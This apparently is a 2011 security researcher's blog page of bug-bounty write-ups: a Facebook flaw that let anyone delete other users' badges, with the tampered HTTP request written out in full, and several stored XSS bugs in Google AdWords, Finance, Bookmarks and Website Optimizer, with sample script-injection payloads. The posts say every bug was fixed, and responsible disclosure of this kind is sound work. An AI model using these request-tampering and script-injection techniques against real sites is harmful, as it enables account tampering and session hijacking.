Pages

Thursday, August 25, 2011

Uncrackable? - Exceptional Cracking

Okay, I've been waiting for a long time for a case worth posting in my blog. I ran into this one during a search for much less interesting, standard challenges, for teaching newbies the basics of RE.
This one is a bit beyond what you guys are used to, and I really want you to give it a try before you read this. If you crack it quickly then don't bother reading, if you already have 3 letters of the serial and you're stuck you should start reading from phrase F.

I won't teach you how to use a debugger or how to trace the relevant RE chunk of code, there's tons of tutorials that'd do just that. You should consider this as a case study, what's interesting is the case itself and my focus would be accordingly.
Background:
One of the reasons I chose this crackme is because it "forces" u to focus on discovering the serial itself and not just 'patch & trash' waste of time, additionally the serial discovery is special.
Goal:
The goal is to find the serial key. I'll show the entire process including the method I used and why I chose to use that method, and I'll hand over the correct serial.
CrackMe Download Mirrors:

Friday, April 8, 2011

Facebook Vulnerability - Destroy Any advertisements/badges! (permission issue)

These days Facebook is one of the heaviest engine of advertising, many companies use Facebook to promote their products and even hire people to deal just with that.


I found an attack vector that can be used by any hacker to delete badges/ads from people's/companies's accounts which will cause a damage to every blog/other website
because a new bages will have a new "bid" so every website will drop the old badge.

This issue effects the Badges feature 
As for: 
Badges Home
Profile Badges
Like Badges
Photo Badges
Page Badges

Vulnerability Details:
A user uses the badges feature to share on blogger or any other place
an attacker see the bage in some website/blog:
<img src="http://badge.facebook.com/badge/1403380007.3098.1711802846.png" width="336" height="84" style="border: 0px;">
Analyzing the Picture's name:
The first number 1403380007 is the Victim's facebook owner ID
(it's easy to get this id using a simple search in facebook)
Now the middle number: 3098 is the bid(badge id) 

Now what the Attacker needs is to capture a deleting badge packet
and manipulate the "bid" and "owner_id"

POST /ajax/facebook-widgets/delete_badge.php?__a=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/badges/profile.php?status=new
Origin: http://www.facebook.com
X-SVN-Rev: 349667
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 ....
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mycookie
Content-Length: 137

bid=3098&owner_id=1403380007&post_form_id=073ca00487f1c8fb8903a6ff04ed57be&fb_dtsg=4xsur&lsd&post_form_id_source=AsyncRequest&confirmed=1

Then a successful badge delete will be performed on the victim's account


The Facebook Team Fixed this issue and thanked me by adding my name into the Facebook WhiteHats thank you list : Facebook Security WhiteHats

Best Regards,
Ben Hayak 

Saturday, April 2, 2011

Google Security Vulnerability Reward Program: Google Adwords Billing poisoning

Overview
Google Adwords Google's Online Advertising service, boost website traffic and sales, was vulnerable to a persistent XSS in the Billing information.

What Had to be done?
                            
The Billing information details was vulnerable to a persistent xss in 5 different fields.
The locations were:
Business name,
Contact name:
both Street Addresses, and City.
This attack was performed by editing the billing information with the right xss payload (no special bypass required).
This XSS is so persistent that it isn't possible even for the administrator to delete the poisoned billing information.


Screen shoot:

This issue has been fixed by Google security team.

I appreciate the opportunity to preserve my skills and gain some more experience
Thank you Google security team.

Tuesday, March 22, 2011

Google Security Vulnerability Reward Program: Take Control Over Adwords Service!

Overview
Google Adwords Google's Online Advertising service, boost website traffic and sales, was vulnerable to a persistent XSS in the main page Dashboard!

What Had to be done?

Well, here I discovered that the Dashboard page stored the Campaigns and the Ad groups as 'widgets' so I went for it and found it was vulnerable. this attack target could be anyone in the adwords service either 'read only','standard' or 'Administrator' access of course, a member who can edit/add Campaigns can take control over the administrator's account and perform actions with administrator permissions as for example attacker could cause the administrator give the attacker admin access with a malicious javascript payload , without the need of any user interaction from the administrator this attack will trigger as soon as the admin or the other victim, enters the adwords service. this way I could perform session hijacking or take control over the account.

Image triggering the xss on the
Vulnerable location #1 (Campaign):


Vulnerable location #2 (Ad Group):

This issue has been fixed by Google security team.

I appreciate the opportunity to preserve my skills and gain some more experience
Thank you Google security team.

Sunday, February 27, 2011

Google Security Vulnerability Reward Program: Google Website Optimizer - Stored XSS

Overview
Google WebsiteOptimizer Google's free website testing and optimization tool, missed a very important check when people create their experiments. additionally they made it more easier to exploit.

What Had to be done?

The first step was creating a new experiment I preferred A/B Experiment, then I had an option to add URLs to verify my website is real, as first I inserted some string "BenHayak" for example and pressed continue.
After that screen I had an option to throw the dirty job over to my "Webmaster" - "Your Webmaster will install and do the dirty work for you ;)". Great they give me a link to Google domain validation page with links to BenHayak when I clicked it I noticed it opens a page with only "BenHayak" in the address bar.
Then I made another Experiment filled with many javascript:alert('BenHayak'); and sent this stored xss report alog with recommendation to always check for "http://" in the input.

POC link: Click to trigger the Alert stored xss

Image triggering the xss:


I appreciate the opportunity to preserve my skills and gain some more experience
Thank you Google security team.

Updates

Well, It's been couple of weeks since I wanted to update the blog with
new vulnerabilities I found in Google products.
But, as for now these bugs aren't fixed yet,
I will publish it soon, after Google will fix the issues.

Best regards,
Ben Hayak

Thursday, February 17, 2011

Google Security Vulnerability Reward Program: Google Bookmarks Stored XSS

Overview
Google Bookmarks lets you create an online bookmark lists. I found this one in the "New Section" function. In order for this XSS to trigger though, the victim had to edit your section.

What Had to be done?

The first step was creating a new bookmark list. After I got that done, I created a New section with Image tag poisioned with XSS payload. The final step was inviting the victim by giving him/her access to my bookmarks list.



This issue has been fixed by Google security team.

I appreciate the opportunity to preserve my skills and gain some more experience
Thank you Google security team.

Wednesday, February 16, 2011

Google Security Vulnerability Reward Program: Google Finance Stored XSS

Overview
Google Finance lets you create Portfolios. After a few tries I figured a method to 
Trigger XSS using portfolio name.

What Had to be done?

OK, at First I used different payloads in the Portfolio name but nothing triggered,
but after some more research I found that after I create my Portfolio payload and click on one of these Deposit / Withdraw my Portfolio name is inserted into this function
function initPage() {
initVars();
dview = google.finance.portfolio.init({
id: '8',
expected_hash: 'U66jb3VTR2ZPUjgtaXJqaXRZc2s33VNmVWdjfDEyOTc4NzE22NDk',
edition: 'us',
name: '--XSS PAYLOAD--',
currency: 'USD'
}, true,
'/finance/s/7skxqAM7Z8M/chart9.swf?hl=en&gl=us',
true
,
false,
''
);
name: '--XSS PAYLOAD--' , so I inserted this payload as portfolio name: </script><body onload=alert(1)>  there was a filter that when you insert this </script> the server removed everything before the </script>


I appreciate the opportunity to preserve my skills and gain some more experience
Thank you Google security team.